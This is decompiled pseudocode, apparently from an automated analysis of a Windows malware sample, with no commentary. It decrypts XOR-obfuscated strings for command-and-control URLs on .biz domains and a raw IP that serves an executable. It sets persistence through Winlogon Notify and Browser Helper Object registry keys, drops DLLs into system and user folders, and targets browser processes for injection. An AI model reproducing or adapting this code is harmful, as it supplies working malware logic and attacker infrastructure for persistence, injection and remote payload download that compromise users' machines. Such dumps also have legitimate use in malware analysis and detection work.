								_t499 = "rmass.exe";
								while(1) {
									__eflags = _t499 - 0x41059b;
									if(_t499 >= 0x41059b) {
										break;
									}
									 *_t499 =  *_t499 ^ 0x000000d4;
									__eflags =  *_t499;
									_t499 = (_t499 ^ _t1171) + 1;
								}
								_t500 = "RECOVER32.DLL";
								while(1) {
									__eflags = _t500 - 0x410591;
									if(_t500 >= 0x410591) {
										break;
									}
									 *_t500 =  *_t500 ^ 0x000000d4;
									__eflags =  *_t500;
									_t500 = (_t500 ^ _t1171) + 1;
								}
								_t501 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\\{BC84DF00-BC38-9902-8082-6FCBF2D87A0B}";
								while(1) {
									__eflags = _t501 - 0x410583;
									if(_t501 >= 0x410583) {
										break;
									}
									 *_t501 =  *_t501 ^ 0x000000d4;
									__eflags =  *_t501;
									_t501 = (_t501 ^ _t1171) + 1;
								}
								_t502 = "gymspzd.dll";
								while(1) {
									__eflags = _t502 - 0x41051a;
									if(_t502 >= 0x41051a) {
										break;
									}
									 *_t502 =  *_t502 ^ 0x000000d4;
									__eflags =  *_t502;
									_t502 = (_t502 ^ _t1171) + 1;
								}
								_t503 = "aset32.exe";
								while(1) {
									__eflags = _t503 - 0x41050e;
									if(_t503 >= 0x41050e) {
										break;
									}
									 *_t503 =  *_t503 ^ 0x000000d4;
									__eflags =  *_t503;
									_t503 = (_t503 ^ _t1171) + 1;
								}
								_t504 = "ahuy.exe";
								while(1) {
									__eflags = _t504 - 0x410503;
									if(_t504 >= 0x410503) {
										break;
									}
									 *_t504 =  *_t504 ^ 0x000000d4;
									__eflags =  *_t504;
									_t504 = (_t504 ^ _t1171) + 1;
								}
								_t505 = "idbg32.exe";
								while(1) {
									__eflags = _t505 - 0x4104fa;
									if(_t505 >= 0x4104fa) {
										break;
									}
									 *_t505 =  *_t505 ^ 0x000000d4;
									__eflags =  *_t505;
									_t505 = (_t505 ^ _t1171) + 1;
								}
								_t506 = "ntdbg.exe";
								while(1) {
									__eflags = _t506 - 0x4104ef;
									if(_t506 >= 0x4104ef) {
										break;
									}
									 *_t506 =  *_t506 ^ 0x000000d4;
									__eflags =  *_t506;
									_t506 = (_t506 ^ _t1171) + 1;
								}
								_t507 = "http://%s.biz/d/N?";
								while(1) {
									__eflags = _t507 - 0x4104e5;
									if(_t507 >= 0x4104e5) {
										break;
									}
									 *_t507 =  *_t507 ^ 0x000000d4;
									__eflags =  *_t507;
									_t507 = (_t507 ^ _t1171) + 1;
								}
								_t508 = "http://%s.biz/d/G?";
								while(1) {
									__eflags = _t508 - 0x4104d2;
									if(_t508 >= 0x4104d2) {
										break;
									}
									 *_t508 =  *_t508 ^ 0x000000d4;
									__eflags =  *_t508;
									_t508 = (_t508 ^ _t1171) + 1;
								}
								_t509 = "http://utbidet-ugeas.biz/d/rpt?";
								while(1) {
									__eflags = _t509 - 0x4104bf;
									if(_t509 >= 0x4104bf) {
										break;
									}
									 *_t509 =  *_t509 ^ 0x000000d4;
									__eflags =  *_t509;
									_t509 = (_t509 ^ _t1171) + 1;
								}
								_t510 = "modem";
								while(1) {
									__eflags = _t510 - 0x41049d;
									if(_t510 >= 0x41049d) {
										break;
									}
									 *_t510 =  *_t510 ^ 0x000000d4;
									__eflags =  *_t510;
									_t510 = (_t510 ^ _t1171) + 1;
								}
								_t511 = "isdn";
								while(1) {
									__eflags = _t511 - 0x410497;
									if(_t511 >= 0x410497) {
										break;
									}
									 *_t511 =  *_t511 ^ 0x000000d4;
									__eflags =  *_t511;
									_t511 = (_t511 ^ _t1171) + 1;
								}
								_t512 = "%u.%u.%u.%s";
								while(1) {
									__eflags = _t512 - 0x410492;
									if(_t512 >= 0x410492) {
										break;
									}
									 *_t512 =  *_t512 ^ 0x000000d4;
									__eflags =  *_t512;
									_t512 = (_t512 ^ _t1171) + 1;
								}
								_t513 = "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}";
								while(1) {
									__eflags = _t513 - 0x410486;
									if(_t513 >= 0x410486) {
										break;
									}
									 *_t513 =  *_t513 ^ 0x000000d4;
									__eflags =  *_t513;
									_t513 = (_t513 ^ _t1171) + 1;
								}
								_t514 = "%ComSpec%";
								while(1) {
									__eflags = _t514 - 0x410425;
									if(_t514 >= 0x410425) {
										break;
									}
									 *_t514 =  *_t514 ^ 0x000000d4;
									__eflags =  *_t514;
									_t514 = (_t514 ^ _t1171) + 1;
								}
								_t515 = "%CommonProgramFiles%\\System\\";
								while(1) {
									__eflags = _t515 - 0x41041b;
									if(_t515 >= 0x41041b) {
										break;
									}
									 *_t515 =  *_t515 ^ 0x000000d4;
									__eflags =  *_t515;
									_t515 = (_t515 ^ _t1171) + 1;
								}
								_t516 = "%AppData%\\";
								while(1) {
									__eflags = _t516 - 0x4103fe;
									if(_t516 >= 0x4103fe) {
										break;
									}
									 *_t516 =  *_t516 ^ 0x000000d4;
									__eflags =  *_t516;
									_t516 = (_t516 ^ _t1171) + 1;
								}
								_t517 = "Debugger";
								while(1) {
									__eflags = _t517 - 0x4103f3;
									if(_t517 >= 0x4103f3) {
										break;
									}
									 *_t517 =  *_t517 ^ 0x000000d4;
									__eflags =  *_t517;
									_t517 = (_t517 ^ _t1171) + 1;
								}
								_t518 = "IsInstalled";
								while(1) {
									__eflags = _t518 - 0x4103ea;
									if(_t518 >= 0x4103ea) {
										break;
									}
									 *_t518 =  *_t518 ^ 0x000000d4;
									__eflags =  *_t518;
									_t518 = (_t518 ^ _t1171) + 1;
								}
								_t519 = "StubPath";
								while(1) {
									__eflags = _t519 - 0x4103de;
									if(_t519 >= 0x4103de) {
										break;
									}
									 *_t519 =  *_t519 ^ 0x000000d4;
									__eflags =  *_t519;
									_t519 = (_t519 ^ _t1171) + 1;
								}
								_t520 = "museum";
								while(1) {
									__eflags = _t520 - 0x4103d5;
									if(_t520 >= 0x4103d5) {
										break;
									}
									 *_t520 =  *_t520 ^ 0x000000d4;
									__eflags =  *_t520;
									_t520 = (_t520 ^ _t1171) + 1;
								}
								_t521 = "GET /%s HTTP/1.0\r\nHost: %s\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
								while(1) {
									__eflags = _t521 - 0x4103ce;
									if(_t521 >= 0x4103ce) {
										break;
									}
									 *_t521 =  *_t521 ^ 0x000000d4;
									__eflags =  *_t521;
									_t521 = (_t521 ^ _t1171) + 1;
								}
								_t522 = "GET /%s HTTP/1.0\r\nHost: %s:%u\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0)\r\n\r\n";
								while(1) {
									__eflags = _t522 - 0x410371;
									if(_t522 >= 0x410371) {
										break;
									}
									 *_t522 =  *_t522 ^ 0x000000d4;
									__eflags =  *_t522;
									_t522 = (_t522 ^ _t1171) + 1;
								}
								_t523 = "Mozilla/4.0 (compatible; MSIE 6.0; Win32)";
								while(1) {
									__eflags = _t523 - 0x410309;
									if(_t523 >= 0x410309) {
										break;
									}
									 *_t523 =  *_t523 ^ 0x000000d4;
									__eflags =  *_t523;
									_t523 = (_t523 ^ _t1171) + 1;
								}
								_t524 = "HTTP/1.0 200";
								while(1) {
									__eflags = _t524 - 0x4102c8;
									if(_t524 >= 0x4102c8) {
										break;
									}
									 *_t524 =  *_t524 ^ 0x000000d4;
									__eflags =  *_t524;
									_t524 = (_t524 ^ _t1171) + 1;
								}
								_t525 = "urlinj_conn";
								while(1) {
									__eflags = _t525 - 0x4102bb;
									if(_t525 >= 0x4102bb) {
										break;
									}
									 *_t525 =  *_t525 ^ 0x000000d4;
									__eflags =  *_t525;
									_t525 = (_t525 ^ _t1171) + 1;
								}
								_t526 = "urlinj_creat";
								while(1) {
									__eflags = _t526 - 0x4102af;
									if(_t526 >= 0x4102af) {
										break;
									}
									 *_t526 =  *_t526 ^ 0x000000d4;
									__eflags =  *_t526;
									_t526 = (_t526 ^ _t1171) + 1;
								}
								_t527 = "urlinj_xfer";
								while(1) {
									__eflags = _t527 - 0x4102a2;
									if(_t527 >= 0x4102a2) {
										break;
									}
									 *_t527 =  *_t527 ^ 0x000000d4;
									__eflags =  *_t527;
									_t527 = (_t527 ^ _t1171) + 1;
								}
								_t528 = "urlinj_creat_f";
								while(1) {
									__eflags = _t528 - 0x410296;
									if(_t528 >= 0x410296) {
										break;
									}
									 *_t528 =  *_t528 ^ 0x000000d4;
									__eflags =  *_t528;
									_t528 = (_t528 ^ _t1171) + 1;
								}
								_t529 = "urlinj_fork";
								while(1) {
									__eflags = _t529 - 0x410287;
									if(_t529 >= 0x410287) {
										break;
									}
									 *_t529 =  *_t529 ^ 0x000000d4;
									__eflags =  *_t529;
									_t529 = (_t529 ^ _t1171) + 1;
								}
								_t530 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced";
								while(1) {
									__eflags = _t530 - 0x41027b;
									if(_t530 >= 0x41027b) {
										break;
									}
									 *_t530 =  *_t530 ^ 0x000000d4;
									__eflags =  *_t530;
									_t530 = (_t530 ^ _t1171) + 1;
								}
								_t531 = "ConnPred";
								while(1) {
									__eflags = _t531 - 0x410230;
									if(_t531 >= 0x410230) {
										break;
									}
									 *_t531 =  *_t531 ^ 0x000000d4;
									__eflags =  *_t531;
									_t531 = (_t531 ^ _t1171) + 1;
								}
								_t532 = "UseExtProfile";
								while(1) {
									__eflags = _t532 - 0x410227;
									if(_t532 >= 0x410227) {
										break;
									}
									 *_t532 =  *_t532 ^ 0x000000d4;
									__eflags =  *_t532;
									_t532 = (_t532 ^ _t1171) + 1;
								}
								_t533 = "UseDflProfile";
								while(1) {
									__eflags = _t533 - 0x410219;
									if(_t533 >= 0x410219) {
										break;
									}
									 *_t533 =  *_t533 ^ 0x000000d4;
									__eflags =  *_t533;
									_t533 = (_t533 ^ _t1171) + 1;
								}
								_t534 = "http://utbidet-ugeas.biz/d/cc";
								while(1) {
									__eflags = _t534 - 0x41020b;
									if(_t534 >= 0x41020b) {
										break;
									}
									 *_t534 =  *_t534 ^ 0x000000d4;
									__eflags =  *_t534;
									_t534 = (_t534 ^ _t1171) + 1;
								}
								_t535 = "grazie.gif";
								while(1) {
									__eflags = _t535 - 0x4101ed;
									if(_t535 >= 0x4101ed) {
										break;
									}
									 *_t535 =  *_t535 ^ 0x000000d4;
									__eflags =  *_t535;
									_t535 = (_t535 ^ _t1171) + 1;
								}
								_t536 = "http://69.50.173.166/gdnOT2424.exe";
								while(1) {
									__eflags = _t536 - 0x4101e2;
									if(_t536 >= 0x4101e2) {
										break;
									}
									 *_t536 =  *_t536 ^ 0x000000d4;
									__eflags =  *_t536;
									_t536 = (_t536 ^ _t1171) + 1;
								}
								_t537 = "tombul.gif";
								while(1) {
									__eflags = _t537 - 0x4101a5;
									if(_t537 >= 0x4101a5) {
										break;
									}
									 *_t537 =  *_t537 ^ 0x000000d4;
									__eflags =  *_t537;
									_t537 = (_t537 ^ _t1171) + 1;
								}
								_t538 = "SubshellState";
								while(1) {
									__eflags = _t538 - 0x41019a;
									if(_t538 >= 0x41019a) {
										break;
									}
									 *_t538 =  *_t538 ^ 0x000000d4;
									__eflags =  *_t538;
									_t538 = (_t538 ^ _t1171) + 1;
								}
								_t539 = "g00d d0gg";
								while(1) {
									__eflags = _t539 - 0x41018c;
									if(_t539 >= 0x41018c) {
										break;
									}
									 *_t539 =  *_t539 ^ 0x000000d4;
									__eflags =  *_t539;
									_t539 = (_t539 ^ _t1171) + 1;
								}
								_t540 = "winlogon.exe";
								while(1) {
									__eflags = _t540 - 0x410182;
									if(_t540 >= 0x410182) {
										break;
									}
									 *_t540 =  *_t540 ^ 0x000000d4;
									__eflags =  *_t540;
									_t540 = (_t540 ^ _t1171) + 1;
								}
								_t541 = "explorer.exe";
								while(1) {
									__eflags = _t541 - 0x410175;
									if(_t541 >= 0x410175) {
										break;
									}
									 *_t541 =  *_t541 ^ 0x000000d4;
									__eflags =  *_t541;
									_t541 = (_t541 ^ _t1171) + 1;
								}
								_t542 = "iexplore.exe";
								while(1) {
									__eflags = _t542 - 0x410168;
									if(_t542 >= 0x410168) {
										break;
									}
									 *_t542 =  *_t542 ^ 0x000000d4;
									__eflags =  *_t542;
									_t542 = (_t542 ^ _t1171) + 1;
								}
								_t543 = "firefox.exe";
								while(1) {
									__eflags = _t543 - 0x41015b;
									if(_t543 >= 0x41015b) {
										break;
									}
									 *_t543 =  *_t543 ^ 0x000000d4;
									__eflags =  *_t543;
									_t543 = (_t543 ^ _t1171) + 1;
								}
								_t544 = "mozilla.exe";
								while(1) {
									__eflags = _t544 - 0x41014f;
									if(_t544 >= 0x41014f) {
										break;
									}
									 *_t544 =  *_t544 ^ 0x000000d4;
									__eflags =  *_t544;
									_t544 = (_t544 ^ _t1171) + 1;
								}
								_t545 = "seamonkey.exe";
								while(1) {
									__eflags = _t545 - 0x410143;
									if(_t545 >= 0x410143) {
										break;
									}
									 *_t545 =  *_t545 ^ 0x000000d4;
									__eflags =  *_t545;
									_t545 = (_t545 ^ _t1171) + 1;
								}
								_t546 = "opera.exe";
								while(1) {
									__eflags = _t546 - 0x410135;
									if(_t546 >= 0x410135) {
										break;
									}
									 *_t546 =  *_t546 ^ 0x000000d4;
									__eflags =  *_t546;
									_t546 = (_t546 ^ _t1171) + 1;
								}
								_t547 = "DLLName";
								while(1) {
									__eflags = _t547 - 0x41012b;
									if(_t547 >= 0x41012b) {
										break;
									}
									 *_t547 =  *_t547 ^ 0x000000d4;
									__eflags =  *_t547;
									_t547 = (_t547 ^ _t1171) + 1;
								}
								_t548 = "Startup";
								while(1) {
									__eflags = _t548 - 0x410123;
									if(_t548 >= 0x410123) {
										break;
									}
									 *_t548 =  *_t548 ^ 0x000000d4;
									__eflags =  *_t548;
									_t548 = (_t548 ^ _t1171) + 1;
								}
								_t549 = "CLSID\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}\\InProcServer32";
								while(1) {
									__eflags = _t549 - 0x41011b;
									if(_t549 >= 0x41011b) {
										break;
									}
									 *_t549 =  *_t549 ^ 0x000000d4;
									__eflags =  *_t549;
									_t549 = (_t549 ^ _t1171) + 1;
								}
								_t550 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\{0D97A4D2-9F3D-E91C-5EAD-E685720E2FCC}";
								while(1) {
									__eflags = _t550 - 0x4100d0;
									if(_t550 >= 0x4100d0) {
										break;
									}
									 *_t550 =  *_t550 ^ 0x000000d4;
									__eflags =  *_t550;
									_t550 = (_t550 ^ _t1171) + 1;
								}
								_t551 = "ThreadingModel";
								while(1) {
									__eflags = _t551 - 0x41005e;
									if(_t551 >= 0x41005e) {
										break;
									}
									 *_t551 =  *_t551 ^ 0x000000d4;
									__eflags =  *_t551;
									_t551 = (_t551 ^ _t1171) + 1;
								}
								_t552 = "Both";
								while(1) {
									__eflags = _t552 - 0x41004f;
									if(_t552 >= 0x41004f) {
										break;
									}
									 *_t552 =  *_t552 ^ 0x000000d4;
									__eflags =  *_t552;
									_t552 = (_t552 ^ _t1171) + 1;
								}
								_t553 = "http://%s/";
								while(1) {
									__eflags = _t553 - 0x41004a;
									if(_t553 >= 0x41004a) {
										break;
									}
									 *_t553 =  *_t553 ^ 0x000000d4;
									__eflags =  *_t553;
									_t553 = (_t553 ^ _t1171) + 1;
								}
								while(1) {
									__eflags = 0x40fa40 - "http://%s/";
									if(0x40fa40 >= "http://%s/") {
										break;
									}
									 *0x40fa40 =  *0x40fa40 ^ 0x0000004d;
									__eflags =  *0x40fa40;
									 *(_t1249 + 0x40) =  *(_t1249 + 0x40) ^ _t1163;
								}
								while(1) {
									__eflags = 0x40e640 - 0x40fa40;
									if(0x40e640 >= 0x40fa40) {
										break;
									}
									 *0x40e640 =  *0x40e640 ^ 0x0000004d;
									__eflags =  *0x40e640;
									 *(_t1249 + 0x40) =  *(_t1249 + 0x40) ^ _t1163;
								}
								while(1) {
									__eflags = 0x408840 - 0x40e640;
									if(0x408840 >= 0x40e640) {
										break;
									}
									 *0x408840 =  *0x408840 ^ 0x0000004d;
									__eflags =  *0x408840;
									 *(_t1249 + 0x40) =  *(_t1249 + 0x40) ^ _t1163;
								}
								_t558 = CreateFileA(_t1253 + 0x1580, 0x80000000, 1, 0, 3, 0, 0); // executed
								 *(_t1253 + 0xa0) = _t558;
								__eflags = _t558;
								if(_t558 != 0) {
									__eflags = _t558 - 0xffffffff;
									if(_t558 != 0xffffffff) {
										SetFilePointer(_t558, 0xfffffff0, 0, 2); // executed
										ReadFile( *(_t1253 + 0xb0), 0x4120e0, 0x10, _t1253 + 0xa0, 0); // executed
										CloseHandle( *(_t1253 + 0xa0)); // executed
										__eflags =  *0x4120e0;
										if( *0x4120e0 == 0) {
											 *0x4120e0 = E004010B2();
											 *(_t1253 + 0x20) = 1;
										}
									}
								}
								_t559 = ".exe";
								while(1) {
									__eflags = _t559 - 0x408822;
									if(_t559 >= 0x408822) {
										break;
									}
									 *_t559 =  *_t559 ^ 0x000000d4;
									_t559 =  &(_t559[1]);
								}
								_t560 = ".dll";
								while(1) {
									__eflags = _t560 - 0x40881d;
									if(__eflags >= 0) {
										break;
									}
									 *_t560 =  *_t560 ^ 0x000000d4;
									__eflags =  *_t560;
									_t560 = (_t560 ^ _t1171) + 1;
								}
								_t561 =  *0x4120e0; // 0x8ff5b2f0
								 *(_t1253 + 0x9c) = _t561;
								 *0x412090 = E00401F84(".exe", _t1253 + 0x9c, __eflags);
								 *0x4120a0 = E00401F84(".exe", _t1253 + 0x9c, __eflags);
								 *0x4120b0 = E00401F84(".exe", _t1253 + 0x9c, __eflags);
								 *0x4120c0 = E00401F84(".dll", _t1253 + 0x9c, __eflags);
								_t1176 = _t1253 + 0x9c;
								_t571 = E00401F84(".dll", _t1176, __eflags);
								_push( *0x4120b0);
								 *0x4120d0 = _t571;
								_t573 = E004010DC(_t1253 + 0x156c);
								_push(_t573); // executed
								L00405E50(); // executed
								__eflags = _t573;
								_t52 = _t573 == 0;
								__eflags = _t52;
								 *(_t1253 + 0x1c) = (_t573 & 0xffffff00 | _t52) & 0x000000ff;
								_t576 = "qnd_b__-12";
								while(1) {
									__eflags = _t576 - 0x408818;
									if(_t576 >= 0x408818) {
										break;
									}
									 *_t576 =  *_t576 ^ 0x000000d4;
									__eflags =  *_t576;
									_t576 = (_t576 ^ _t1176) + 1;
								}
								_t577 = "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connection Policy";
								while(1) {
									__eflags = _t577 - 0x40880d;
									if(_t577 >= 0x40880d) {
										break;
									}
									 *_t577 =  *_t577 ^ 0x000000d4;
									__eflags =  *_t577;
									_t577 = (_t577 ^ _t1176) + 1;
								}
								_t578 = "Default Flags";
								while(1) {
									__eflags = _t578 - 0x4087a5;
									if(_t578 >= 0x4087a5) {
										break;
									}
									 *_t578 =  *_t578 ^ 0x000000d4;
									__eflags =  *_t578;
									_t578 = (_t578 ^ _t1176) + 1;
								}
								 *(_t1253 + 0x34) = 1;
								while(1) {
									_push( *(_t1253 + 0x34));
									wsprintfA(0x408816, "%02X");
									_t580 = CreateMutexA(0x408778, 1, "qnd_b__-12"); // executed
									 *(_t1253 + 0x1c) = _t580;
									_t1253 = _t1253 + 0xc;
									__eflags = _t580;
									if(_t580 == 0) {
										goto L405;
									}
									_t581 = GetLastError();
									__eflags = _t581 - 0xb7;
									if(_t581 != 0xb7) {
										__eflags =  *(_t1253 + 0x34) - 0x11;
										if( *(_t1253 + 0x34) > 0x11) {
											_t1114 = _t1253 + 0x134c;
											_t582 = ExpandEnvironmentStringsA("%ComSpec%", _t1114, 0x104);
											__eflags = _t582;
											if(_t582 != 0) {
												_t968 = CreateFileA(_t1114, 0x80000000, 1, 0, 3, 0, 0); // executed
												 *(_t1253 + 0xa0) = _t968;
												__eflags = _t968 - 0xffffffff;
												_t1215 = _t968;
												if(_t968 != 0xffffffff) {
													GetFileTime(_t1215, _t1253 + 0x84, _t1253 + 0x88, _t1253 + 0x8c);
													CloseHandle( *(_t1253 + 0xa0));
													 *(_t1253 + 0xc) = 1;
												}
											}
											__eflags =  *(_t1253 + 0x1c);
											if( *(_t1253 + 0x1c) != 0) {
												L427:
												_t584 = CreateFileA(_t1253 + 0x1580, 0x80000000, 1, 0, 3, 0, 0);
												 *(_t1253 + 0xa0) = _t584;
												__eflags = _t584;
												if(_t584 == 0) {
													L430:
													 *(_t1253 + 0x14) = 0;
													_t1250 = 0;
													__eflags = 0;
													L431:
													CloseHandle(CreateThread(0, 0x1000, E00401038, _t1253 + 0x1570, 0, _t1253 + 0x9c));
													_t589 = 0x408720;
													while(1) {
														__eflags = _t589 - 0x408776;
														if(_t589 >= 0x408776) {
															break;
														}
														 *_t589 =  *_t589 ^ 0x000000d4;
														_t589 =  &(_t589[1]);
													}
													while(1) {
														__eflags = 0x407b20 - 0x408720;
														if(0x407b20 >= 0x408720) {
															break;
														}
														 *0x407b20 =  *0x407b20 ^ 0x0000004d;
														__eflags =  *0x407b20;
														 *(_t1250 + 0x40) =  *(_t1250 + 0x40) ^ _t1163;
													}
													__eflags =  *0x412100 - 2;
													if( *0x412100 != 2) {
														L463:
														 *(_t1253 + 0x78) = 0x10;
														_t1115 = _t1253 + 0x1ec;
														_t592 = GetComputerNameA(_t1115, _t1253 + 0x78);
														__eflags = _t592;
														if(_t592 == 0) {
															L465:
															_push("QlC5hT0yHn63XEm5LqJ2OxSkGj2v");
															_push(_t1253 + 0x1bc);
															L00405E20();
															L469:
															wsprintfA(0x4122b0, "{%02X%02X%02X%02X-%02x%02x-%02x%02x-%02X%02X-%02X%02X%02X%02X%02x%02x}",  *((char*)(_t1253 + 0x1f4)),  *((char*)(_t1253 + 0x1f1)),  *((char*)(_t1253 + 0x1ee)),  *((char*)(_t1253 + 0x1eb)),  *((char*)(_t1253 + 0x1e8)),  *((char*)(_t1253 + 0x1e5)),  *((char*)(_t1253 + 0x1e2)),  *((char*)(_t1253 + 0x1df)),  *((char*)(_t1253 + 0x1dc)),  *((char*)(_t1253 + 0x1d9)),  *((char*)(_t1253 + 0x1d6)),  *((char*)(_t1253 + 0x1d3)),  *((char*)(_t1253 + 0x1d0)),  *((char*)(_t1253 + 0x1cd)),  *((char*)(_t1253 + 0x1ca)),  *((char*)(_t1253 + 0x1c7)));
															_t1254 = _t1253 + 0x48;
															_t611 = 0x407aa0;
															while(1) {
																__eflags = _t611 - 0x407ad5;
																if(_t611 >= 0x407ad5) {
																	break;
																}
																 *_t611 =  *_t611 ^ 0x000000d4;
																_t611 =  &(_t611[1]);
															}
															while(1) {
																__eflags = 0x4072a0 - 0x407aa0;
																if(0x4072a0 >= 0x407aa0) {
																	break;
																}
																 *0x4072a0 =  *0x4072a0 ^ 0x0000004d;
																__eflags =  *0x4072a0;
																 *(_t1250 + 0x40) =  *(_t1250 + 0x40) ^ _t1163;
															}
															_push(0x4122b0);
															_push(0x407aa0);
															_t1116 =  &(_t1254[0x410]);
															_push(_t1116);
															L00405E20();
															_push(0x4072a0);
															L00405E30();
															_t614 = RegCreateKeyA(0x80000002, _t1116,  &(_t1254[0x26]));
															__eflags = _t614;
															if(_t614 != 0) {
																L500:
																_t616 = E004030DE( &(_t1254[0x1ee]));
																_t1254[0x26] = _t616;
																__eflags = _t616;
																if(_t616 == 0) {
																	L520:
																	_t617 = E004010B2();
																	__eflags = _t617;
																	_t1177 = _t617;
																	if(_t617 == 0) {
																		_t1177 = 0x42;
																	}
																	_t1254[0x1ee] = _t1177;
																	_t618 = E004010B2();
																	__eflags = _t618;
																	_t1178 = _t618;
																	if(_t618 == 0) {
																		_t1178 = 0x4d;
																	}
																	_t1254[0x162] = _t1178;
																	_push( *0x4120b0);
																	_push( &(_t1254[0x163]));
																	L00405E20();
																	_push( &(_t1254[0x55a]));
																	_push( &(_t1254[0x1ac]));
																	L00405E20();
																	_t1225 = _t1254[5];
																	_t622 = _t1225 + _t1250;
																	while(1) {
																		__eflags = _t1225 - _t622;
																		if(_t1225 >= _t622) {
																			break;
																		}
																		 *_t1225 =  *_t1225 ^ _t1254[0x162] & 0x000000ff;
																		_t1225 =  &(_t1225[0]);
																		_t622 = _t1254[5] + _t1250;
																	}
																	_t1117 =  &(_t1254[0x517]);
																	_t623 = ExpandEnvironmentStringsA("%AppData%\\", _t1117, 0x104);
																	__eflags = _t623;
																	if(_t623 == 0) {
																		L531:
																		_t1118 =  &(_t1254[0x516]);
																		_t624 = GetTempPathA(0x104, _t1118);
																		__eflags = _t624;
																		if(_t624 == 0) {
																			L539:
																			E00401029(_t1254[5]);
																			_t1119 =  &(_t1254[0x387]);
																			_t627 = GetSystemDirectoryA(_t1119, 0x104);
																			_push(0x80);
																			_push( *0x4120c0);
																			_push(0x41103e);
																			_push(_t1119);
																			L00405E30();
																			L00405E30();
																			SetFileAttributesA(_t627, _t627);
																			_t629 = CreateFileA(_t1119, 0x40000000, 0, 0, 2, 0x80, 0);
																			_t1254[0x28] = _t629;
																			__eflags = _t629;
																			if(_t629 == 0) {
																				L546:
																				_t630 = GetLastError();
																				__eflags = _t630 - 0x20;
																				if(_t630 != 0x20) {
																					_t1120 =  &(_t1254[0x387]);
																					_t631 = ExpandEnvironmentStringsA("%AppData%\\", _t1120, 0x104);
																					_push(0x80);
																					_push( *0x4120c0);
																					L00405E30();
																					SetFileAttributesA(_t631, _t1120);
																					_t633 = CreateFileA(_t1120, 0x40000000, 0, 0, 2, 0x80, 0);
																					_t1254[0x28] = _t633;
																					__eflags = _t633;
																					if(_t633 == 0) {
																						L550:
																						_t634 = GetLastError();
																						__eflags = _t634 - 0x20;
																						if(_t634 == 0x20) {
																							goto L547;
																						}
																						_t805 = GetTempPathA(0x104, _t1120);
																						_push(0x80);
																						_push( *0x4120c0);
																						L00405E30();
																						SetFileAttributesA(_t805, _t1120);
																						_t807 = CreateFileA(_t1120, 0x40000000, 0, 0, 2, 0x80, 0);
																						_t1254[0x28] = _t807;
																						__eflags = _t807;
																						if(_t807 == 0) {
																							L553:
																							_t808 = GetLastError();
																							__eflags = _t808 - 0x20;
																							if(_t808 == 0x20) {
																								goto L547;
																							}
																							L556:
																							_t1121 =  &(_t1254[0x343]);
																							_t639 = ExpandEnvironmentStringsA("%AppData%\\", _t1121, 0x104);
																							_push(0x80);
																							_push( *0x4120d0);
																							L00405E30();
																							SetFileAttributesA(_t639, _t1121);
																							_t641 = CreateFileA(_t1121, 0x40000000, 0, 0, 2, 0x80, 0);
																							_t1254[0x28] = _t641;
																							__eflags = _t641;
																							_t1179 = _t641;
																							if(_t641 == 0) {
																								L558:
																								_t1122 =  &(_t1254[0x342]);
																								_t642 = GetTempPathA(0x104, _t1122);
																								_push(0x80);
																								_push( *0x4120d0);
																								L00405E30();
																								SetFileAttributesA(_t642, _t1122);
																								_t644 = CreateFileA(_t1122, 0x40000000, 0, 0, 2, 0x80, 0);
																								_t1254[0x28] = _t644;
																								__eflags = _t644;
																								_t1179 = _t644;
																								if(_t644 == 0) {
																									L561:
																									_t1254[0x342] = 0;
																									L562:
																									__eflags = _t1254[0x342];
																									if(_t1254[0x342] != 0) {
																										CreateFileA( &(_t1254[0x348]), 0x80000000, 1, 0, 3, 0, 0);
																									}
																									_t1123 =  &(_t1254[0x2b]);
																									GetSystemDirectoryA(_t1123, 0x104);
																									_push(0x41103e);
																									_push(_t1123);
																									L00405E30();
																									E004012C2(_t1123);
																									ExpandEnvironmentStringsA("%CommonProgramFiles%\\System\\", _t1123, 0x104);
																									E004012C2(_t1123);
																									ExpandEnvironmentStringsA("%AppData%\\", _t1123, 0x104);
																									E004012C2(_t1123);
																									_t654 = 0x407220;
																									while(1) {
																										__eflags = _t654 - 0x40724d;
																										if(_t654 >= 0x40724d) {
																											break;
																										}
																										 *_t654 =  *_t654 ^ 0x000000d4;
																										_t654 =  &(_t654[1]);
																									}
																									_t655 = RegOpenKeyExA(0x80000002, 0x407220, 0, 0x20006,  &(_t1254[0x26]));
																									__eflags = _t655;
																									if(_t655 == 0) {
																										L569:
																										__eflags = _t1254[0xb];
																										if(_t1254[0xb] == 0) {
																											_t1136 =  &(_t1254[0x55a]);
																											_t795 = E00401251(_t1254[0x26]);
																											_push(_t1136);
																											L00405E40();
																											_t796 = _t795 + 1;
																											__eflags = _t796;
																											RegSetValueExA(_t1254[0x2b],  *0x4120b0, 0, 1, _t1136, _t796);
																										}
																										RegDeleteValueA(_t1254[0x27], "winrnt.exe");
																										RegCloseKey(_t1254[0x26]);
																										L572:
																										__eflags =  *0x412100 - 2;
																										if( *0x412100 != 2) {
																											L612:
																											CloseHandle(CreateThread(0, 0x10000, E0040265F, 2, 0,  &(_t1254[0x27])));
																											_t660 = 0x407000;
																											while(1) {
																												__eflags = _t660 - 0x407060;
																												if(_t660 >= 0x407060) {
																													break;
																												}
																												 *_t660 =  *_t660 ^ 0x000000d4;
																												_t660 =  &(_t660[1]);
																											}
																											_t1254[0xc] = 0;
																											while(1) {
																												E004011CF(0x80000002, 0x407000);
																												__eflags = _t1254[0xc] - 9;
																												if(_t1254[0xc] <= 9) {
																													goto L651;
																												}
																												L617:
																												_t1254[0x16] = 0;
																												_t1254[0x17] = 0;
																												_t719 = E004025C3();
																												__eflags = _t719;
																												if(_t719 != 0) {
																													L648:
																													 *_t1254 = 0;
																													L652:
																													_t1254[0xd] = 0x3b;
																													do {
																														__eflags = _t1254[0x342];
																														if(_t1254[0x342] != 0) {
																															_push(0);
																															_push("opera.exe");
																															_push("seamonkey.exe");
																															_push("mozilla.exe");
																															_push("firefox.exe");
																															_push("iexplore.exe");
																															_push("explorer.exe");
																															E0040318D( &(_t1254[0x349]));
																															_t1254 =  &(_t1254[8]);
																														}
																														__eflags = _t1254[0xa];
